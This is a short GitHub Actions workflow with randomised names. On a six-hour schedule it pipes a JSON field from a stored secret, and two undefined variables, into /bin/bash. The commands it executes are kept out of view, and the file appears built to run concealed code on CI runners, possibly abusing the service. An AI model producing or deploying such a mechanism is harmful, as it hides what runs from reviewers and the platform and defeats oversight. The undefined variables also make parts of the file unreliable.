name: yinzhiping2389

on:
  workflow_dispatch:
  schedule:
    - cron: '36 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yinzhiping2389
        env:
          kvpb7470: ${{ secrets.kvpb7470 }}
        run: |
          echo $kvpb7470 | jq -r .nvoow8027 | /bin/bash
          echo $c164 | jq -r .gm93598 | /bin/bash
          echo $tk8453 | jq -r .e2780 | /bin/bash

